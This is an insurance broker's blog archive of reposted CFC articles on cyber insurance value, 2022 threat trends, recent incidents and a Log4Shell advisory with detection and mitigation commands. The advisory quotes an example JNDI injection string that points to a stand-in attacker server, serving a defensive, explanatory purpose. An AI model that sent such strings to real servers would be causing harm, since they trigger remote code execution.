1-888-643-2217 Email ABEX
Keeping you updated

Category Archives: Cyber Liability

Does Cyber Insurance Cost Too Much?

We often hear that cost can make cyber insurance a non-starter for businesses. We get it; broad coverage comes at a price given the value of services provided with a policy these days.

So, CFC has listed below the 5 key reasons a cyber insurance policy, is worth the financial investment.

Cyber is a business’ largest exposure
We’re in a digital age and businesses no longer rely on paper trails and filing cabinets. This digital reliance has shifted a business’ assets from tangible to intangible, making them wildly accessible and opening even the smallest of businesses to a whole new era of risk.

Subsequently, most companies today state that cyber risk is in their top three, if not their number one business risk given their reliance on technology. Since the frequency of loss is that much greater for a cyber event than traditional perils, such as a fire – it makes sense that the cost of cyber insurance today will mirror a business’ largest exposure.

CFC has created a cyber risk heat map, which explains the varying levels by industry. Hint, nearly no business is safe!

Premiums are a fraction of the cost compared to a cyber claim
The price of cyber insurance may seem higher than expected given many still consider it a discretionary purchase, but when you compare the thousands, hundreds of thousands, or even millions in costs that cyberattacks can incur for business, it’s an easy decision to make.

And the severity of those claims continues to rise. According to the latest Coveware report, it’s been noted that fewer victims are paying ransomware demands, so threat actors are demanding more money to compensate for the lower hit rate, making individual claims more expensive.

This lower hit rate on ransomware has also meant hackers are pivoting back to previous attack techniques, with the likes of business email compromise attacks showing an increase of 147% across the second half of 2022 (for SME businesses).

A good cyber policy should offer proactive protection from attacks
At CFC, from the minute the policy is bound, their cyber security team works around the clock to protect businesses against cyber-attacks.

This is a proactive, protective service that identifies potential threats using insights from a variety of sources, including public and private threat intelligence feeds that go well beyond the usual outside-in scanning tools available to insurers. If a cyber security issue is found, their team will reach out through their Response app to work with a potentially compromised business, to eliminate the threat before it can cause harm.

To pay for this level of monitoring externally, a business would need multiple providers, all individually costing upwards of thousands every year. Whereas, all of this work is done for free, as part of the standalone CFC cyber policy, as well as expert incident response and recovery.

Expert incident response and recovery
One of the other critical elements of a cyber policy is the availability of in-house cyber incident response. At CFC, their team of cyber threat analysts, digital forensic specialists and incident responders, CFC Response, is available 24/7 to triage incidents, contain threats, and repair networks if a cyber incident occurs.

Cyber policies cover a lot
A good, stand-alone cyber policy, such as a CFC cyber policy, includes comprehensive coverage.

Many small businesses do not have access to enterprise-grade security teams, threat intelligence feeds that can inform them of whether they are listed on a threat actor’s target list, or access to a multi-disciplinary team of experts who know how to respond to cyber-attacks and compliment existing IT personnel.

Equally, should the worst happen, cyber insurance policies cover cyber incident response costs, including IT forensics, legal, breach notification and crisis communications to cybercrime costs that include social engineering, theft of personal funds and cyber extortion.

All told, this can cost anywhere from thousands to hundreds of thousands, and there is no limit to the range of support required during a cyber incident. CFC’s security team estimates that the average downtime following a ransomware attack can be up to 2-3 weeks, and that’s only with the expert assistance of a cyber incident response team provided by an insurer. With a broad policy, the insured can focus on getting their business back up and running, rather than worrying about what will and won’t be covered by their insurer.

It is estimated that that cyber-attacks will cost the globe $8 trillion dollars in 2023. Yet, we estimate, only less than 20% of businesses have taken out a cyber insurance policy as of today. Cyber insurers are not just there to step in after an attack has taken place, ready to pay the many external teams a business needed to pull in to recover.  Instead, coverage from a cyber insurer like CFC protects and prevents attacks on businesses from the minute they bind a policy.

Cyber insurance is not expensive, cyberattacks are. And with the right cyber insurance product, it should be the easiest purchase a business has ever made to cover its largest exposure.

Source: www.cfcunderwriting.com


Cyber Trends Predicted for 2022

2021 was certainly a time of change for the cyber insurance market and it’s looking like 2022 will be no different.

The cyber threat landscape over the last year has proven to be the most volatile yet in the history of the market, for the simple reason that the risk is too low and the profitability too high for threat actors. As a result, cyber insurers have had to evolve just as quickly to prevent and respond, leading to the following predictions for the year ahead:

Zero-day ransomware attacks
Zero-day ransomware attacks will dominate the headlines, whereby criminals exploit software vulnerabilities before any patches are available to avoid them by businesses. This means that the only way to prevent an attack is through improved security controls in advance.

Fear of a systemic risk event
Third party dependencies will continue to be a weak link for cyber risk. Managed service providers and cloud computing providers will continue to be lucrative targets for cybercriminals, with the fear of the next large-scale systemic risk event – where a single event has the potential to impact thousands of businesses – at the forefront of everyone’s mind.

Cyber insurance = risk management service
Cyber insurance will predominantly become a proactive risk management service. Insurers will seek to prevent claims before they happen and will pivot to conducting scans to detect vulnerabilities as an added service through mobile app technology.

Increased regulatory and governmental scrutiny
Increased scrutiny by both regulators and government advisory groups with a focus on improving security standards for businesses to prevent attacks. Equally, government bodies will seek to ensure there is more transparency around when businesses decide to pay ransom demands through legislation.

Targeting manufacturers and distributors
Criminals will continue to target businesses in industries where standards for security have historically been weak. Manufacturers and distributors have been particularly impacted in the last year given dependencies on automation, robotics, and the supply chain as entryways in their networks.

Continual hardening of the market
As a result, the cyber market is expected to continue to harden with more corrective action taken on rates to ensure the coverage can be maintained as broadly as it has been. Cyber will move from ‘hard to sell’ to ‘hard to buy’ based on limited available capacity, and undoubtedly become where a company’s largest exposure now lies.

So, that’s what CFC thinks will be the most prominent trends hitting the cyber insurance market throughout 2022, but what do you think?

 

Source: www.cfcunderwriting.com


Log4Shell Vulnerability

Log4Shell (CVE-2021-44228) is a critical vulnerability that has been actively exploited and scanned for by malicious actors since its discovery beginning of December. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

What is Log4j 2?

The Log4Shell vulnerability results from how log messages are being handled by the processor in log4j2, an open-source logging service provided by the Apache Group that provides logging for numerous projects. It enables attackers to run arbitrary code on servers running vulnerable versions of the Apache Log4j 2 library.

An attacker can send a specially crafted message, which contains a link to a server they control. For example, they may send a message including the string ${jndi:ldap://evil.xa/x}, where ldap://evil.xa is the attacker-controlled server.

The specially crafted message is passed to the log4j library so it can be logged, but in doing so it queries the malicious server. The malicious server will then respond with directory information, along with whatever code the attacker wants to execute on the victim server. Finally, the victim server downloads this response and executes the code included in the response.

Some of the products known to be using this, and therefore vulnerable to the vulnerability, are:

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume
Apache Hadoop
Apache Kafka
Apache Solr
Apache Spark
Apache Struts
Apache Tapestry
Apache Wicket
Elastic Elasticsearch
Elastic Logstash
Ghidra
Grails
Minecraft
Apache Tomcat
Dropwizard
Elastic Kibana
Hibernate
JavaServer Faces
Oracle ATG Web Commerce
Spring Framework

Why is this critical?

The vulnerability itself allows an attacker to load arbitrary – potentially malicious – code into the target server. This code might add a backdoor to a server, cryptojack or even carry out a ransomware attack.

The vulnerability was published earlier in December alongside a working proof-of-concept that would enable malicious actors to exploit it.

How to mitigate?

To mitigate against this vulnerability, we recommend installing the latest updates (2.15.0 or later), and the regular and timely updating of any affected third-party software. This should be done on all devices, not only those directly exposed to the internet.

To support the first priority action above, you also should determine if Log4j is installed elsewhere. Java applications can include all the dependent libraries within their installation. To do this, you should undertake a file system search for log4j, searching inside EAR, JAR and WAR files e.g.:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

If a dependency or package manager is used, this can be searched. For example:

dpkg -l | grep log4j

There could be multiple copies of Log4j present and each copy will need to be updated or mitigated.

If updating Log4j 2 is not feasible, this vulnerability can still be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true”. This can be done by restarting the Java service through the use of an argument:

java -Dlog4j2.formatMsgNoLookups=true …

or you can set an Environment Variable for the JVM arguments:

JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true

Please contact your IT department with any questions on updates needed.

Source: www.cfcunderwriting.com

 


How Much Could Ransomware Cost Your Client?

CFC’s new tool helps you find the answer.

Ransomware attacks are a disproportionately expensive type of cyber event, accounting for 81% of all cyber-related losses last year. But how much it costs an individual business depends on their industry sector and size as well as a number of other factors, from how long they were out of action to whether sensitive data was stolen.

Built from data analysis relating to thousands of cyber events handled by CFC, this new tool gives users low, medium, and high severity ransomware loss estimates based on just four simple pieces of business information. It also generates a bespoke, downloadable report explaining the methodology used.

Try it out and help your clients get to grips with the single biggest cyber threat facing their business today.

Click here to enter CFC’s brand new ransomware calculator.

Source: www.cfcunderwriting.com


September Cyber Incidents

It’s been busy in the world of cyber risk, and September is no exception. In the past month, we’ve seen big players like Apple and Microsoft suffer zero-day vulnerabilities as well as ransomware continuing to wreak havoc across the globe.

  1. The return of the REvil ransomware groupThe REvil ransomware gang has returned and is attacking new victims and publishing their stolen files.

    Following a massive attack on July 2nd, which exploited a zero-day vulnerability in the Kaseya VSA platform to encrypt 60 managed service providers and over 1,500 businesses, REvil shut down their infrastructure and completely disappeared. The attack’s impact was felt worldwide, bringing the attention of international law enforcement, and the REvil gang suddenly shut down on July 13th.

    To everyone’s surprise, the REvil ransomware gang came back to life on 7th September under the same name when the Tor payment/negotiation and data leak sites suddenly turned back on and became accessible. Proof of new attacks emerged on September 9th when someone uploaded a new REvil ransomware sample compiled on September 4th to VirusTotal. On September 11th, the group published screenshots of stolen data for a new victim on their data leak site.

  2. Windows MSHTML zero-day exploits shared between attackersThreat actors are sharing Windows MSHTML zero-day (CVE-2021-40444) tutorials and exploits on hacking forums, allowing other hackers to start exploiting the new vulnerability in their own attacks.

    On 7th September, Microsoft disclosed a new zero-day vulnerability in Windows MSHTML that allows threat actors to create malicious documents, including Office and RTF docs, to execute commands on a victim’s computer remotely. After the vulnerability was disclosed, Microsoft Defender and other security programs were configured to detect and block parts of this attack.

    While these mitigations will help, as the exploit has been modified not to use ActiveX controls, users are still at risk until an official security update is released. Until Microsoft releases a security update, everyone should treat all Word and RTF attachments suspiciously and their source manually verified before opening them.

  3. Olympus hit with BlackMatter ransomwareOlympus, a leading medical technology company, is investigating a “potential cybersecurity incident” that impacted some of its EMEA IT systems last week. Olympus has more than 31,000 employees worldwide and over 100 years of history developing for the medical, life sciences, and industrial equipment industries.

    While Olympus did not share any details on the attackers’ identity, ransom notes left on systems impacted during the breach point to a BlackMatter ransomware attack. The same ransom notes also point to a Tor website the BlackMatter gang has used in the past to communicate with victims.

  4. Apple patches zero-day flaw exploited by NSO GroupApple has released security updates for a zero-day vulnerability that affects every iPhone, iPad, Mac and Apple Watch. Citizen Lab, which discovered the vulnerability and was credited with the find, urges users to immediately update their devices.

    Citizen Lab said it has now discovered new artifacts of the ForcedEntry vulnerability which it first revealed in August as part of an investigation.

    This exploit is significant because it breaks through new iPhone defenses that Apple had baked into iOS 14, dubbed BlastDoor, which were supposed to prevent silent attacks by filtering potentially malicious code. Citizen Lab calls this exploit ForcedEntry for its ability to skirt Apple’s BlastDoor protections.

    Citizen Lab said it attributes the ForcedEntry exploit to NSO Group with high confidence, citing evidence it has seen that it has not previously published.

Source: www.cfcunderwriting.com


Blog

FOLLOW OUR BLOG

Receive notifications of new posts automatically.



ABEX - AFFILIATED BROKERS EXCHANGE IS ON FACEBOOK.

Like us on Facebook

Connect with us on LinkedIn